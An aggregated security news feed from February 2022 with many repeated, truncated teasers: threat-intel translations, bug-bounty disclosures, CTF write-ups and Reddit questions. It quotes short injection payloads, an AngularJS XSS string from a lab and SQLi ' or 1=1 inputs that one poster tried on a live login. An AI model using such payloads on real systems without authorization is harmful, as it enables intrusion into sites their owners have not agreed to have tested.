    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
  • Open

    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
  • Open

    Types of attacks I have learned
    Man in the middle attack Continue reading on Medium »
  • Open

    研究显示,高速增长企业伴随着更高的黑客风险
    根据美国无密码身份平台提供商Beyond Identity的最新研究显示,相比于增长率平缓的公司,高速增长的公司遭遇网络安全漏洞攻击的可能性更大。
    2021年91%的英国组织遭到邮件钓鱼攻击
    根据Proofpoint的2022年网络钓鱼情况报告,去年,超过十分之九(91%)的英国组织被邮件钓鱼成功入侵 。
    这样的钓鱼邮件,你会中招吗?
    钓鱼邮件无处不在,如何防范可得擦亮眼睛。
    注意,谷歌MFA验证拦不住这类网络钓鱼攻击
    一种新型的网络钓鱼攻击却可以绕过MFA,攻击者利用VNC屏幕共享系,让目标用户直接在攻击者控制的服务器上登录其帐户,因此可绕过MFA。
    倒计时15天!CIS2021 Spring·春日版直播邀您线上相聚
    3月9日,让我们相约线上直播,不见不散~
    FreeBuf早报 | DDoS攻击在 2021 年呈螺旋式上升;Sea Mar被控数据泄露疏忽
    Neustar Security Services 发布了一份报告,详细介绍了 2021 年网络攻击的持续增长,其中DDoS 攻击数量空前。
    电信诈骗黑灰产业链现状(三):免签、代收、代付技术成诈骗主流洗钱方式
    虚假网赚、虚假投资等诈骗场景中,受害人之所以轻易相信对方,缘于骗局早期,能够获得骗子返回的任务佣金。
  • Open

    Rust Related CVE Entries
    Article URL: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rust Comments URL: https://news.ycombinator.com/item?id=30438575 Points: 2 # Comments: 0
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    Article URL: https://www.cyrusimap.org/sasl/sasl/release-notes/2.1/index.html#new-in-2-1-28 Comments URL: https://news.ycombinator.com/item?id=30435871 Points: 1 # Comments: 0

  • Open

    Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis
    Recommendations on how to proactively prepare to defend against the potential cyber impact of the escalating Russia-Ukraine crisis. The post Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis appeared first on Unit42.
  • Open

    Best CS undergrad programs for a prospective pentester?
    Wondering if anyone here can speak to which college CS programs best prep their students to take on pentesting. I'd prefer a program that focuses on getting me the skills I need to understand the computer and just to give me general depth in my field. I know pentesting is what I want to do professionally, so something that would let me focus on that is preferable. submitted by /u/NotVeryMega [link] [comments]
    Is it possible I could be targeted?
    Kinda what the title says. I started out this morning with the ability to call out. Then my phone just started hanging up instantly. Put Sim in different phone, same thing. Tried calling it, straight to voicemail. Went to Walmart to get a new sim and phone number. Got ten minutes of the ability to make calls, then the same exact thing. Got a new phone, different carrier. Same thing ten minutes, then no more voice ability. Could it be possible some one put out some kinda hit on me? submitted by /u/YddishMcSquidish [link] [comments]
    How much day rate for pentester contractors in the UK?
    Due to an increase surge of work of a new contract, my company needs penetration tester contractors which would be good to use on an ad-hoc basis. What are the typical rates for pentesters and how long do a typical contract go on for? E.g. £500 a day for 3 months for example for someone with 3-5 experience. Is this reasonable pricing? I have been asked to find ones in the UK due to familiarity with certain frameworks like cyber essentials and CREST. It would be great if someone can share some figures so I can know what to expect with varying experience and qualification such as CRT and CCT as well. Thank you. submitted by /u/HamsterMoisture [link] [comments]
    EDR etc for ONE linux box?
    What setup/software/etc do you recommend to protect my personal linux computer? E.g. vectors I see: it could get pwned by malicious python packages, malicious VSCode extensions, malicious NPM etc. Less likely: Browser exploits. I was experimenting with only letting my browser phone out (the usual malware on linux just connects out naively). But then I have to open everything up again to install stuff. ClamAV is a joke, but something like carbon black makes no sense for a single box. Ideas? submitted by /u/medusabadhairday [link] [comments]
    SIEM Onboarding for IaaS/PaaS over Azure/AWS
    As someone who has been witnessing quite an amount of transformation across all sectors. Have been wondering what are the improvements Vendors and OEMs have made on SIEM Onboarding front. Do OEM/Vendors still prefer/recommend syslog, installing proprietary agents or the oh so obsolete RPC(for Windows) to onboard systems or have some vendors/OEMs also started pushing for cloud native solutions like Event Hub/SQS. A lot of vendors do show greenlight on integration with S3/Event Hub but dont support any sort of parsing for these log sources (Windows and Linux), one cannot expect anyone to actually create parsers from scratch for the entire Windows Ecosystem. As large orgs start deploying Control Towers with dedicated logging buckets anyone can poll off and ingest, how do you guys scale your SIEM deployments and utilize these architectural changes ? submitted by /u/w33ha_AD [link] [comments]
    Where to turn on VPN (laptop vs phone) when hotspotting my phone
    Lets get straight to it - I have two questions regarding where to turn on VPN (laptop vs phone) Lets say im at a hotel and would like to hotspot my phone so that I can access the internet using my laptop. Question is, where do i turn on VPN? On my phone or on my laptop? Based on my research, many seem to suggest to turn on VPN on the laptop. My question then, is, what if I would like to browse the internet on my phone? Or do stuff on whatsapp, etc. Must I turn on VPN on my phone for these activities too? submitted by /u/AliveandDrive [link] [comments]
    Is it SQL injection?
    Hey Chief, A friend of mine has set up a website where she used a hosting service, I don't remember its name, The admin login functionality from that hosting service asked for username and password combination, I typed a few SQLi payloads (' or 1=1 kinda stuff) but instead of throwing login password/username incorrect error, it showed pretty unsual error and took pretty long to do so, Is that a sign of SQL based injection? Does that mean the website is likely vulnerable to SQL injection or smtg similar? Please help, because that friend of mine has setup her website for business usage and isn't sure that hosting provider is secure and whatnot. submitted by /u/The_Intellectualist [link] [comments]
    Security automation
    I have been using node-red to automate a couple of daily tasks. for example - enrich alerts with virus total intelligence - test and verify DLP configuration is set up correctly - add IP to block list in AWS WAF - pull metrics from crowd strike to PowerBI for manager report - etc. ​ I am considering writing a blog or sharing in a security talk. Is there anyone interested in this topic? Any good platform to speak about this? submitted by /u/Calm_Scene [link] [comments]
  • Open

    “OSINT Investigations: We know what you did that summer” Notes
    OSINT Investigations: We know what you did that summer by Information Warfare Center is packed with OSINT advice and resources, including… Continue reading on Medium »
    Cybersoc DVLA OSINT writeup
    Following is an OSINT challenge DVLA writeup offered by cybersoc. Continue reading on Medium »
    Wonderland- Tryhackme CTF
    Steps Continue reading on Medium »
    OSINTGRAM
    What is osintgram ? Continue reading on Medium »
    Capture The Talent — Pwn Write-up : Global Pandemic
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52 Continue reading on Medium »
  • Open

    Seeking Freelancer for WeChat Recovery
    Computer Forensics For WeChat - Seeking A Freelancer We need someone who can restore WeChat messages from an iPhone backup. Please contact me privately or details. submitted by /u/P2T-2022 [link] [comments]
    Volatility 3 commands and usage tips to get started with memory forensics. Volatility 3 + plugins make it easy to do advanced memory analysis.
    submitted by /u/DFIRScience [link] [comments]
    Certs
    Any certs you recommend for a cs analyst to get more knowledge and skills in digital forensics? submitted by /u/mooncrestle [link] [comments]
    When carving a file type without a footer, how do I know the range?
    I am doing an assignment, and in the assignment volume, I found a Bitmap header. How do I know the range of the file? My professor said he would go over it but never did submitted by /u/KTthemajicgoat [link] [comments]
  • Open

    Samy Kamkar takes down MySpace
    Greatest Moments in Hacking History: Samy Kamkar Takes Down Myspace — YouTube Continue reading on Medium »
  • Open

    IDOR in "external status check" API leaks data about any status check on the instance
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1372216 - Bounty: $610
    broken authentication (password reset link not expire after use in https://network.tochka.com/sign-up)
    QIWI disclosed a bug submitted by uddeshaya: https://hackerone.com/reports/1401891 - Bounty: $100
    FULL SSRF
    Acronis disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1241149
    Claiming the listing of a non-delivery restaurant through OTP manipulation
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1330529 - Bounty: $3250
    api key exposed in github.com//
    8x8 disclosed a bug submitted by adnanmalikinfo: https://hackerone.com/reports/1454965
  • Open

    Paper HackTheBox Write-Up
    Easy box made by Jin Continue reading on Medium »
    The most underrated tool in bug bounty. (and the filthiest one liner possible)
    One liner tool chains for bug bounty, dependent on one vital tool. Continue reading on Medium »
    SQLi: next level
    you may have seen some SQL injections that exploiting them are not as straightforward as what you see in the ethical hacking courses. like… Continue reading on Medium »
    rDEX Bug Bounty Recap
    Overview Continue reading on StaFi »
    PORTSWIGGER WEB SECURITY - XXE (XML EXTERNAL ENTITY) INJECTION LAB ÇÖZÜMLERİ
    XXE (XML External Entity) Injection, bir saldırganın web uygulama üzerinde XML verilerini enjekte etmesine veya değiştirmesine olanak… Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    My Pentest Log -7-
    Greetings to all from Sergius and Bacchus, Continue reading on Medium »
    2FA Misconfiguration leads to adding any number as 2FA verification
    I was testing 2FA on a website. At first, I tried to bypass 2FA but I was not successful, then I thought of something else. What if I can… Continue reading on Techiepedia »
  • Open

    Operation Cache Pandas
    submitted by /u/dmchell [link] [comments]
    Chasing the Silver Petit Potam to Domain Admin
    submitted by /u/ZephrX112 [link] [comments]
  • Open

    How to Fix the specialadves WordPress Redirect Hack
    Attackers are regularly exploiting vulnerable plugins to compromise WordPress websites and redirect visitors to spam and scam websites. This has been an ongoing campaign for multiple years. Payload domains are regularly swapped out and updated, but the objective remains largely the same: trick unsuspecting users into clicking on malicious links to propagate adware and push bogus advertisements onto victim’s desktops. The most recent variation of this WordPress hack involves the following domain: specialadves[.]com If your website is redirecting visitors to pages that look something like this then your website is likely compromised: In today’s post we will review how to remove the specialadves malware from your WordPress website. Continue reading How to Fix the specialadves WordPress Redirect Hack at Sucuri Blog.
  • Open

    Challenge-3 Weekly Cloud Security Challenge
    submitted by /u/0xdeadbeef0000 [link] [comments]
    Horde Webmail 5.2.22 - Account Takeover via Email
    submitted by /u/monoimpact [link] [comments]
  • Open

    For the females & gay members of reddit...
    Not saying you have to be gay to enjoy good looking men getting off ... Has rick & morty, Mr Robot plus other stuff so not all men getting all hot and sweaty... Mp4's images ect... submitted by /u/xanderTgreat [link] [comments]
    Construction Company or not...
    Not been around for a while but found this one and wanted to share it...yep porn... Look in folders...mp4's submitted by /u/xanderTgreat [link] [comments]
    a bunch of electronic music and samples, still looking through it but there's some fun stuff so far
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-02-22 Review
    设备指纹技术介绍与综述(一) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-22 Review
    设备指纹技术介绍与综述(一) by ourren 更多最新文章,请访问SecWiki
  • Open

    panic: send on closed channel - 채널을 잘 닫자 🕵🏼‍♂️
    고루틴과 채널은 golang에서 가장 핵심적인 기능 중 하나입니다. 다만 꼼꼼하게 체크하고 사용하지 않으면 여러가지 문제들을 만들어낼 수 있습니다. 그 중 하나는 Close된 채널에 값을 전달하는 상황인데요. 이런 경우 Application은 panic으로 종료하게 됩니다. panic: send on closed channel goroutine 1 [running]: main.main() /tmp/sandbox2358964969/prog.go:19 +0xfc 우선 간단한 방법으로 이를 예방할 수 있는데요. 채널에 값을 보내기 전 채널로 아래 safeCheck 함수와 같이 채널의 Close 여부를 체크하고, 결과에 따라서 값의 송신 여부를 결정하면 됩니다.
  • Open

    The cutting-edge conundrum: Why federal agencies can’t compromise on security
    Invicti sat down with Ryan Cote, former CIO for the Department of Transportation, to chat about AppSec in government and how agencies can modernize security. READ MORE
  • Open

    Ethereum/EVM Smart Contract Reverse Engineering & Disassembly
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    国务院发布《国务院办公厅关于加快推进电子证照扩大应用领域和全国互通互认的意见》
    《意见》共计五章十八条,统筹发展和安全,加强电子证照应用全过程规范管理,严格保护商业秘密和个人信息安全,切实筑牢电子证照应用安全防线。
    新型银行木马正通过Google Play商店攻击英国银行用户
    荷兰安全公司Threat Fabric的研究人员发现了一种名为 Xenomorph的新 Android 银行木马,正对欧洲56家银行的用户下手。
    FreeBuf早报 | Meta或因数据难传输而退出欧洲;在线诉讼等司法活动需保护个人隐私
    Meta收到欧盟主要隐私监管机构发来的“修订版”初步决定,有可能影响其向美国传输欧盟用户数据,甚至有可能因此退出欧洲市场。
    管理非人类账户的生命周期以最小化网络攻击
    对于许多组织而言,非人类账户的访问权限通常保持不变。这为网络犯罪分子提供了利用孤立帐户进行未经授权的访问并发起网络攻击的机会。
    数十位 OpenSea 用户 NFT 被盗,损失超 170 万美元
    OpenSea 数十名用户遭受了网络钓鱼攻击,损失了约价值170万美元的NFT。
    安卓用户注意了!黑客利用“一次性”账户开展诈骗
    一个基于僵尸网络的流氓网站关联了数千部受感染的安卓手机,这再次揭露了依托SMS进行账户验证的漏洞。
    3月9日看CIS 2021大会春日版直播,多重福利拿不停!
    3月9日-10日,CIS 2021 Spring·春日版全议题直播将正式开启,福利活动也将提前上线,参与最高可赢取iPhone13!
    炊具巨头Meyer披露了影响员工的网络攻击
    全球第二大炊具分销商Meyer Corporation向美国司法部长办公室披露了影响其数千名员工的数据泄露事件。
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
  • Open

    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...

  • Open

    Fun ideas for physical pentesting?
    Hey team! So my sec team started a physical security assessment a week ago and its been fun. I got to use the under-the-door tool, tailgate, clone rfid card and bypass motion sensor entrances/exits. I was wondering if you guys had any ideas about what you would do if you had “keys to the kingdom” such as the server room or someones desktop? Edit: grammar submitted by /u/Enes_24 [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Automating a Red Team lab with Packer, Terraform and Ansible
    submitted by /u/nickonos [link] [comments]
    Reading and Writing into Process's Memory
    Get the basic understanding on the remote process memory read and write all by windows 32 API and create your own game hacks. https://tbhaxor.com/reading-and-writing-into-processs-memory/ submitted by /u/tbhaxor [link] [comments]
  • Open

    Comprehensive collection of Bionicle Lego images
    submitted by /u/limb_fed [link] [comments]
    Electronic music and Drum 'n' Bass samples
    http://doa.totallyowns.co.uk/ submitted by /u/CalmWater8439 [link] [comments]
    13 Years of Weird Adult Forum Stuff - Organized by YYMM
    submitted by /u/Rose_Beef [link] [comments]
  • Open

    Command line execution fuzzer and bruteforcer (Equivalent of wfuzz for all command line)
    submitted by /u/cryptaureau [link] [comments]
    Wrote a new blog post on injecting fake credentials into lsass memory using New-HoneyHash and alerting with Elastic.
    submitted by /u/m_edmondson [link] [comments]
    My first vulnerability - Arista gNMI authentication bypass CVE-2021-28500
    submitted by /u/MilesTails [link] [comments]
    Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql
    submitted by /u/toyojuni [link] [comments]
    Find You: Building a stealth AirTag clone
    submitted by /u/breakingsystems [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Plone Scanner Version 0.01
    submitted by /u/halencarjunior [link] [comments]
    nrich: a new tool to quickly find open ports and vulnerabilities via Shodan
    submitted by /u/0xdea [link] [comments]
    Linux kernel NFC Use-After-Free (CVE-2021-23134) PoC
    submitted by /u/awarau888 [link] [comments]
  • Open

    Healing blind injections
    What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones? Continue reading on Medium »
    eCPTX Exam Review by 0xJin
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on Medium »
    What an injection into jQuery-selector can lead to
    ​I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly). Continue reading on Medium »
    XSS in hidden input field
    Hello again! I’m faizan and today I’m writing about an XSS I found in an input field which was hidden from the page using Content division… Continue reading on Medium »
    Parameter Tampering
    First, What is the Parameter Tampering? Continue reading on Medium »
    How I found broken link hijack using Python
    Disclaimer Continue reading on Medium »
    How I could’ve bypassed the 2FA security of Instagram once again?
    … Continue reading on InfoSec Write-ups »
    Attacking Kerberos | Kerberoasting | AS-REP Roasting | Active Directory | Windows |
    This blog covers how to attack Kerberos with Kerberoasting and AS-REP Roasting attacks. Continue reading on System Weakness »
    Polygon Consensus Bypass Bugfix Review
    Summary Continue reading on Immunefi »
  • Open

    I was solving an XSS lab on portswigger when I came across this js payload could anyone please explain me how it works [ {{$on.constructor('alert(1)')()}} ]
    Here is the link to the lab : https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression submitted by /u/_JatinChopra_ [link] [comments]
    Are there any sites with clear information about specific CVEs and how they can be exploited?
    It seems a lot of these sites that I am finding are very vague about the different vulnerabilities. It would be helpful to find a place where I can search the CVE and they can tell me how it is vulnerable and how it can be exploited. submitted by /u/Ok-Oil2953 [link] [comments]
    How are you tracking and documenting SIEM use cases?
    Curious to see what solutions folks have for documenting and tracking SIEM use cases. Are you just throwing everything into a spreadsheet? Using a KB tool like Confluence? Do you have a formalized process for handling changes to rules or retiring them? submitted by /u/wowneatlookatthat [link] [comments]
    SSH: Which server gets which keys to work?
    Sorry if this is a bit of a basic question but I’m setting up my first headless server and could use your advice. I have a server which I’d like to access via SSH. I have created a password protected key file to do so. I will be accessing the server from a few different clients, all belonging to me and no-one else. Is it correct to only have the public key on the server, and to have both the private and public keys on the clients? Or does the server need the private key? Is it even possible for the client to work without both the public and private keys available to it…? submitted by /u/JamieOvechkin [link] [comments]
    Common security-centric query languages?
    I'm working on a personal project relating to security-centric query languages, and I'm trying to get an overview of current (popular) languages. So far, I've got: Splunk Search Processing Language Falcon Query Language Microsoft Kusto Rapid7 Log Entry Query Language Are there other major languages in use currently? submitted by /u/QuirkySpiceBush [link] [comments]
    Receiving OTPs and verification links for different websites from the same number
    Hi all, I recently noticed that i am getting the OTPs/reset links for different websites (such as Instagram and Amazon) from the same number. That is the password reset link for instagram was sent to my phone from the same number as the verification link for amazon. The number is something like 78549659. Is this normal or does each company have a different number for sending such texts? submitted by /u/Euphoric_Asparagus90 [link] [comments]
    SANS SEC522 vs SEC542
    Hey everyone. My employer is paying for me to do a SANS certificate of my choosing, I'm interested in the web/appsec based certs. I was wondering if anyone's taken either of these or would recommend one over the other. Thanks submitted by /u/n3v327311 [link] [comments]
  • Open

    How dangerous is being a digital forensic investigator?
    I am currently doing BSc in Information systems and want to do masters in digital/computer forensics. submitted by /u/SkillKiller3010 [link] [comments]
    Why do some investigations take longer and some shorter?
    I often read in news articles that some suspects have been arrested for internet crimes that take “months long investigation”. Why does it take months long if they already have so called evidence especially if they have received tips on it from organizations such as NCMEC submitted by /u/Ill-Date-1852 [link] [comments]
    Fargate incident response
    How do we isolate affected containers for AWS ECS/EKS in fargate? Creating a new security group for ECS will result in new tasks being recreated to replace the old tasks, so the affected tasks won't be preserved. In EKS, there is no visibility into the security groups of the node. The only way to isolate is through the ACL which is not very ideal as there may be other apps using the same ACL. submitted by /u/SnooKiwis8248 [link] [comments]
    For research - breaking into Computer/Digital Forensics?
    Hey all - hope you're doing well. Doing some research on the Computer/Digital forensics field for a friend - I've looked a bit across Google, postings on job sites, etc. but wanted to get some knowledge from this pretty extensive community! How would someone with an M.A. (Masters) break into Computer or Digital forensics? Is a certification or class worth it (i.e. classes on Udemy, Coursera for specializations, or a university/online bootcamp program on digital or computer based forensics) What is your day-to-day like, how did you get into the field/how do you like it? What are common tools and skills - how much of a technical or IT background is required? Thank you! submitted by /u/sora1493 [link] [comments]
  • Open

    An Accidental SSRF Honeypot in Google Calendar
    This is a story of what both I and Google engineers considered to be an SSRF vulnerability in Google Calendar — but turned out to be some… Continue reading on Medium »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on ITNEXT »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on Medium »
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki周刊(第416期) by ourren 漏洞可用性交流(VEX)介绍 by ourren PAM 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki周刊(第416期) by ourren 漏洞可用性交流(VEX)介绍 by ourren PAM 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
  • Open

    OWASP-LPU CTF: OSINT
    Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 14
    And here we go to Hacktoria’s geolocation number 14 challenge! They keep on coming and I keep on solving them. So without further ado… Continue reading on Medium »
    Never Forget The Moon — OSINT Challenge 18
    On Dec 28, 2021, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »
    Capture The Talent — OSINT Write-ups
    Du samedi 19 au dimanche 20 février 2022, s’est déroulé le CTF de Capture The Talent. 🏆Classement final: 1/52 Continue reading on Medium »
  • Open

    De-anonymize anonymous tips through the Tumblr blog network
    Automattic disclosed a bug submitted by ajoekerr: https://hackerone.com/reports/1484168 - Bounty: $450
    Remote memory disclosure vulnerability in libcurl on 64 Bit Windows
    curl disclosed a bug submitted by nsq11: https://hackerone.com/reports/1444539
    Page has a link to google drive which has logos and a few customer phone recordings
    Zomato disclosed a bug submitted by codersanjay: https://hackerone.com/reports/864712 - Bounty: $200
  • Open

    AntiFuzz: Impeding Fuzzing Audits of Binary Executables
    Article URL: https://neverworkintheory.org/2022/02/21/antifuzz.html Comments URL: https://news.ycombinator.com/item?id=30414501 Points: 9 # Comments: 1
  • Open

    FreeBuf早报 | 豆瓣被爆APP内截图含个人敏感信息;攻击者通过NFT话题分发木马
    豆瓣网被爆出在页面中使用难以察觉的隐形水印,水印的信息包括用户 UID、TID 及带时区的完整时间。
    华云安·ASM技术篇:应对零日攻击的检测模型(VEAM)
    2021年至少发现66个仍在使用中的零日漏洞,数量约是2020年的两倍。
    英国Monzo数字银行用户正受网络钓鱼威胁
    英国数字银行平台Monzo正成为钓鱼攻击的目标,用户收到了含有钓鱼链接的短信。
    价值数百万美元的NFT在攻击中被盗、谷歌向全球32亿用户发出紧急警告|2月21日全球网络安全热点
    2月21日全球网络安全热点。
    最新报告|深信服2021勒索病毒态势报告
    最新报告出炉!
    白宫将乌克兰DDoS攻击锁定在俄罗斯GRU黑客身上
    近期乌克兰发生的DDoS攻击,被指是俄罗斯主导的黑客攻击。
  • Open

    Linux Kernel Use-After-Free (CVE-2021-23134) PoC
    Article URL: https://ruia-ruia.github.io/NFC-UAF/ Comments URL: https://news.ycombinator.com/item?id=30413955 Points: 1 # Comments: 0
  • Open

    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
  • Open

    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
    Oracle WebLogic CVE-2022-21350 漏洞分析
